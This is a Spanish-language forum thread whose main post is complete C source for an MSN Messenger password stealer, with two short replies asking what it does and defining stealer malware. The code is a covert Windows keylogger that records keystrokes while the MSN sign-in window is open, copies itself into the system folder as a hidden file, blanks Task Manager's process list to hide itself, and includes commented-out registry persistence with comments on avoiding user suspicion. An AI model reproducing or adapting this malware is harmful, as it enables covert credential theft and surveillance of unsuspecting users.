Stealer MSN

Iniciado por ANTRAX, Mayo 22, 2011, 10:00:32 PM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Mayo 22, 2011, 10:00:32 PM Ultima modificación: Febrero 08, 2014, 05:47:50 PM por Expermicid
Código: c
#include <stdlib.h>	
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <Winuser.h>  
#include <string.h>

// all includes should be standard in dev

/*
   Name: KOrUPt(not tellin)
   Author: KOrUPt
   Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
   Date Written: 01/10/06 - 04/10/06
   Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
*/


 void keys(int key,char *file) // if you try and view the exe in notepad it discloses
{							 // quite alot of source code(not good), so i may change the key output to codes instead

FILE *key_file;

key_file = fopen(file,"a+");

Sleep(10);

if (key==8)

fprintf(key_file,"%s","[del]");

if (key==13)

fprintf(key_file,"%s","\n");

if (key==32)

fprintf(key_file,"%s"," ");

if (key==VK_CAPITAL)

fprintf(key_file,"%s","[Caps L]");

if (key==VK_TAB)

fprintf(key_file,"%s","[TAB]");

if (key ==VK_CONTROL)

fprintf(key_file,"%s","[CTRL]");

if (key ==VK_PAUSE)

fprintf(key_file,"%s","[PAUSE]");

if (key ==VK_ESCAPE)

fprintf(key_file,"%s","[ESC]");

if (key ==VK_END)

fprintf(key_file,"%s","[END]");

if (key==VK_HOME)

fprintf(key_file,"%s","[HOME]");

if (key ==VK_LEFT)

fprintf(key_file,"%s","[LEFT]");

if (key ==VK_UP)

fprintf(key_file,"%s","[UP]");

if (key ==VK_RIGHT)

fprintf(key_file,"%s","[RIGHT]");

if (key ==VK_DOWN)

fprintf(key_file,"%s","[DOWN]");

if (key ==VK_SNAPSHOT)

fprintf(key_file,"%s","[PRINT]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUM LOCK]");

if (key ==VK_RETURN)

fprintf(key_file,"%s","[ENTER]\n\n");

if (key ==VK_SHIFT)

fprintf(key_file,"%s","[SHIFT]");

if (key ==VK_SPACE)

fprintf(key_file,"%s","[SPACE]");

if (key ==VK_LBUTTON)

fprintf(key_file,"%s","[LM B]");

if (key ==VK_RBUTTON)

fprintf(key_file,"%s","[RM B]");

if (key ==VK_MENU)

fprintf(key_file,"%s","[ALT]");

if (key ==VK_LWIN)

fprintf(key_file,"%s","[Windows key]");

if (key ==VK_ADD)

fprintf(key_file,"%s","[+]");

if (key ==VK_SUBTRACT)

fprintf(key_file,"%s","[-]");

if (key ==VK_DECIMAL)

fprintf(key_file,"%s","[.]");

if (key ==VK_DIVIDE)

fprintf(key_file,"%s","[DIVIDE KEY]");

if (key ==VK_NUMPAD0)

fprintf(key_file,"%s","[NUMPAD 0]");

if (key ==VK_NUMPAD1)

fprintf(key_file,"%s","[NUMPAD 1]");

if (key ==VK_NUMPAD2)

fprintf(key_file,"%s","[NUMPAD 2]");

if (key ==VK_NUMPAD3)

fprintf(key_file,"%s","[NUMPAD 3]");

if (key ==VK_NUMPAD4)

fprintf(key_file,"%s","[NUMPAD 4]");

if (key ==VK_NUMPAD5)

fprintf(key_file,"%s","[NUMPAD 5]");

if (key ==VK_NUMPAD6)

fprintf(key_file,"%s","[NUMPAD 6]");

if (key ==VK_NUMPAD7)

fprintf(key_file,"%s","[NUMPAD 7]");

if (key ==VK_NUMPAD8)

fprintf(key_file,"%s","[NUMPAD 8]");

if (key ==VK_NUMPAD9)

fprintf(key_file,"%s","[NUMPAD 9]");

if (key ==VK_F1)

fprintf(key_file,"%s","[F1 KEY]");

if (key ==VK_F2)

fprintf(key_file,"%s","[F2 KEY]");

if (key ==VK_F3)

fprintf(key_file,"%s","[F3 KEY]");

if (key ==VK_F4)

fprintf(key_file,"%s","[F4 KEY]");

if (key ==VK_F5)

fprintf(key_file,"%s","[F5 KEY]");

if (key ==VK_F6)

fprintf(key_file,"%s","[F6 KEY]");

if (key ==VK_F7)

fprintf(key_file,"%s","[F7 KEY]");

if (key ==VK_F8)

fprintf(key_file,"%s","[F8 KEY]");

if (key ==VK_F9)

fprintf(key_file,"%s","[F9 KEY]");

if (key ==VK_F10)

fprintf(key_file,"%s","[F10 KEY]");

if (key ==VK_F11)

fprintf(key_file,"%s","[F11 KEY]");

if (key ==VK_F12)

fprintf(key_file,"%s","[F12 KEY]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUMLOCK KEY]");

if (key ==VK_SCROLL)

fprintf(key_file,"%s","[SCROLL LOCK]");


/*	  // WONT WORK ON WIN 9X


if (key ==VK_OEM_PLUS)

fprintf(key_file,"%s","[+]");

if (key ==VK_OEM_COMMA)

fprintf(key_file,"%s","[,]");

if (key ==VK_OEM_MINUS)

fprintf(key_file,"%s","[-]");

if (key ==VK_OEM_PERIOD)

fprintf(key_file,"%s","[.]");

*/

if (key ==190 || key==110)

fprintf(key_file,"%s",".");


if (key >=96 && key <= 105){

key = key - 48;

fprintf(key_file,"%s",&key);

}

if (key >=48 && key <= 59)

fprintf(key_file,"%s",&key);



if (key !=VK_LBUTTON || key !=VK_RBUTTON){

if (key >=65 && key <=90){ 

if (GetKeyState(VK_CAPITAL))
	 
fprintf(key_file,"%s",&key);
else

{

key = key +32;

fprintf(key_file,"%s",&key);



}
}

}

fclose(key_file);



}


char buffer[300] = "";
HWND currentwin;
DWORD pid;
unsigned char reg[2] = "1";
HMODULE modH = GetModuleHandle(0);
char dir[255];
char dir2[MAX_PATH];
char dir3[MAX_PATH];
char KeyLogPath[MAX_PATH];			  // holds dir path for wordsv80.ini


  // Functions

BOOL CALLBACK block(HWND hwnd,LPARAM lParam)  // used to hide from taskmgr
{
	char classname[150] = "";
	char windowtext[150] = "";

	GetWindowText(hwnd,windowtext,149);
	GetClassName(hwnd,classname,249);

   
	if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
	{
		SendMessage(hwnd,LVM_DELETEALLITEMS,0,0);  // clears Taskmgr every x seconds
		return FALSE;
	}	
	return TRUE;
}

DWORD WINAPI HideProgram() // also used to hide from taskmgr
{
  for(;;)
 {
Sleep(5);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);   // calls block function evrey 5 milee seconds
 }
}



int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
 {

char i;
GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
strcat(KeyLogPath,"//wordsv80.ini");	  // this is the file that keys are saved to



   // Add to system folder

GetModuleFileName(modH, dir2, 256);
GetSystemDirectory(dir,255);

strcat(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
CopyFile(dir2,dir,FALSE);	 //  but dont know how to change the icon pic, lol, will learn how to soon though
unsigned char dir3[25] = "Sndserv.exe";
SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out



// Add to registry

// I think weird decimal vaules makes it less likly to be deleted because it
// hasnt got any spefic name, it could be somthing really importent, dont forget,
// most people are quite scared of editing there reigstry in case they ruin the whole pc,
// if they see something they dont understand, then the old phase "better save than sorry" springs to mind
// i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
// but im talkin about the N0oBs here, sorry noobs lol

// oh well back to the code
/*
HKEY key1;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
RegCloseKey(key1);


HKEY key2;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
RegCloseKey(key2);										 //  i dont fully know how this key will react on startup, should be alright lol



HKEY key3;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
RegCloseKey(key3);

HKEY key4;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
RegCloseKey(key4);


// was goin to disable regedit, but decided not to
// in case made the user suspicuos, i prefer the stealth method

  */



  while(1)
{
Sleep(20);   // to some save cpu



	 // Just in case we need an emergency exit
   if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
   {
   MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
	 return 0;
   }

		// cannot close program while login box is present
jump:
currentwin =  GetForegroundWindow();
GetWindowText(currentwin,(char*)buffer,300);
if(strstr(buffer,"Sign in to .NET messenger Service- MSN Messenger"))  // or anything else you want a password to lol
{
GetWindowThreadProcessId(currentwin,&pid);

for(i=8;i<=190;i++)	 // activate keyloger
{
if (GetAsyncKeyState(i) == -32767)
{




	 keys (i,KeyLogPath);   // loop through keys function and add keys pressed to file


  goto jump;		// to recheck if logon window is still active, if not continue searching untill found
}
}
}
}
}


Junio 22, 2011, 01:14:21 PM #1
Cual es la funcion de esto?   :o :o (Pusiste buenos codigos fuente! gracias)
Junio 22, 2011, 02:28:47 PM #2
Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.

Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
;)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario